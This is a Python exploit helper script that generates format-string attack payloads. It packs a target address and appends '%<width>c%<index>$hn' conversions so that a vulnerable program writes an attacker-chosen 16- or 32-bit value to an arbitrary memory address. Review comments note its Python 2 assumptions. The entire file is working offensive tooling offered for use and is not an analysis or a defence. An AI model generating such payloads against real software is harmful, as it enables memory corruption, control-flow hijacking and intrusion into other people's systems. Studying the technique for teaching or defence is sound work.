  1. #!/usr/bin/python
  2. from struct import pack
  3. import sys
  4. # -----------------------------------------------------------------------------------
  5. # Title         : Formatstring vuln. exploitation helper
  6. # About         : Creates a single/double short formatstring exploit pattern
  7. # Author        : r3v3rs3r
  8. # Date          : 24-12-2014
  9. # -----------------------------------------------------------------------------------
  10.  
  11.  
  12.  
  13. # -----------------------------------------------------------------------------------
def p(v, e='<L'):
    """Pack the integer *v* with struct format *e*.

    The default '<L' yields 4 little-endian bytes, which is what the
    pattern builders below rely on when they count emitted bytes.
    """
    fmt = e
    return pack(fmt, v)
  16.  
  17.  
  18. # -----------------------------------------------------------------------------------
def rpad_short(i, l=5):
    """Return str(i) zero-padded on the left to at least *l* characters.

    Despite the name the padding is applied on the left (str.rjust), and
    a value longer than *l* digits is returned unchanged.
    """
    digits = str(i)
    width = l
    return digits.rjust(width, '0')
  21.  
  22.  
  23. # -----------------------------------------------------------------------------------
def single_short_pattern(stackindex, writetoaddress, value, currlen=0):
    """
    Build the pattern that writes the low 16 bits of *value* to one address.

    stackindex          : The index of the input on stack
    writetoaddress      : The address to write to; packed first with p() (4 bytes, '<L')
    value               : The data to write (WORD; only the low 16 bits are used)
    currlen             : Number of bytes already emitted before this pattern (default 0)

    Returns the packed address followed by the '%<width>c%<index>$hn' text.
    NOTE(review): Python 2 semantics assumed — p() returns a byte string that is
    concatenated with str below; on Python 3 the '+=' raises TypeError.
    """

    # The packed address is 4 bytes ('<L'), so count it in the running length.
    currlen += 4

    # Width for the %c conversion: low half-word minus what was already
    # emitted, masked back to 16 bits so a negative difference wraps.
    len_1 = ((value & 0xFFFF) - currlen) & 0xFFFF

    # Address first, then the conversion text; rpad_short zero-pads the
    # width to 5 characters.
    r =  p(writetoaddress)
    r += '%{0}c%{1}$hn'.format(rpad_short(len_1), str(stackindex))

    return r
  45.  
  46.  
  47. # -----------------------------------------------------------------------------------
def double_short_pattern(stackindex, writetoaddress, value, currlen=0):
    """
    Build the pattern that writes all 32 bits of *value* as two 16-bit halves.

    stackindex          : The index of the input on stack; the second half uses stackindex + 1
    writetoaddress      : The address to write to; the high half goes to writetoaddress + 2
    value               : The data to write (DWORD)
    currlen             : Number of bytes already emitted before this pattern (default 0)

    Returns both packed addresses followed by the two conversion strings.
    NOTE(review): Python 2 semantics assumed — p() returns a byte string that is
    concatenated with str below; on Python 3 the '+=' raises TypeError.
    """

    # Two packed addresses of 4 bytes each ('<L') precede the text.
    currlen += 8

    # First width: low half-word minus bytes emitted so far, masked to 16 bits.
    len_1 = ((value & 0xFFFF) - currlen) & 0xFFFF
    # Second width: high half-word minus everything emitted so far, which by
    # then also includes the len_1 characters of the first conversion.
    len_2 = ((((value >> 16) & 0xFFFF) - currlen) - len_1) & 0xFFFF

    # Low half targets writetoaddress, high half writetoaddress + 2
    # (a little-endian target layout is assumed, matching the '<L' packing).
    r =  p(writetoaddress)
    r += p(writetoaddress + 2)
    r += '%{0}c%{1}$hn'.format(rpad_short(len_1), str(stackindex))
    if len_2 != 0:
        r += '%{0}c%{1}$hn'.format(rpad_short(len_2), str(stackindex + 1))
    else:
        # Nothing further to emit: omit the %c and keep only the second write.
        r += '%{0}$hn'.format(str(stackindex + 1))

    return r
  75.  
  76. # -----------------------------------------------------------------------------------
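def strtoint(intstr):
    """Parse a command-line integer; hexadecimal when it contains 'x'/'X'.

    intstr : the argument string as taken from sys.argv

    Returns the parsed int. On a malformed value an error message is printed
    and the process exits with status 1 (the original exited with 0, which
    made a failed parse indistinguishable from success to a calling shell).
    """
    try:
        # Accept both '0x..' and '0X..' prefixes; int(s, 16) handles either.
        if 'x' in intstr.lower():
            return int(intstr, 16)
        return int(intstr)
    except (ValueError, TypeError) as e:
        # Parenthesised print behaves the same on Python 2 and 3 (the rest
        # of the file uses the Python 2 statement form).
        print('Error strtoint: %s' % (e,))
        # sys.exit does not depend on the site-module exit() helper.
        sys.exit(1)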
  86.  
  87.  
  88. # -----------------------------------------------------------------------------------
def int_size(value):
    """Return how many 16-bit halves *value* spans.

    1 when the value fits in 16 bits (0..0xFFFF), 2 when any bit above the
    low 16 is set, and 0 for a negative value. OR-ing with 0xFFFF leaves
    exactly 0xFFFF for the first case, something larger for the second, and
    a negative number for the third.
    """
    low_filled = value | 0xFFFF
    if low_filled < 0xFFFF:
        return 0
    return 1 if low_filled == 0xFFFF else 2
  97.  
  98. # -----------------------------------------------------------------------------------
if __name__ == '__main__':
    # Command line: <stack_index> <write_to_address> <value_to_write> [<current_length>]
    # All numbers go through strtoint (decimal, or hex when an 'x' is present).
    usage = 'Usage: python frmtstr.py <stack_index> <write_to_address> <value_to_write> <current_length>(OPTIONAL)'
    args = sys.argv[1:]
    if len(args) < 3:
        print(usage)
    else:
        stackindex, writetoaddress, value = map(strtoint, args[:3])
        # The optional length is honoured only when it is exactly the fourth argument.
        currlen = strtoint(args[3]) if len(args) == 4 else 0

        # Pick the builder by how many 16-bit halves the value occupies.
        builders = {1: single_short_pattern, 2: double_short_pattern}
        build = builders.get(int_size(value))
        if build is None:
            print('Failed to Calculate the value size')
        else:
            print(build(stackindex, writetoaddress, value, currlen))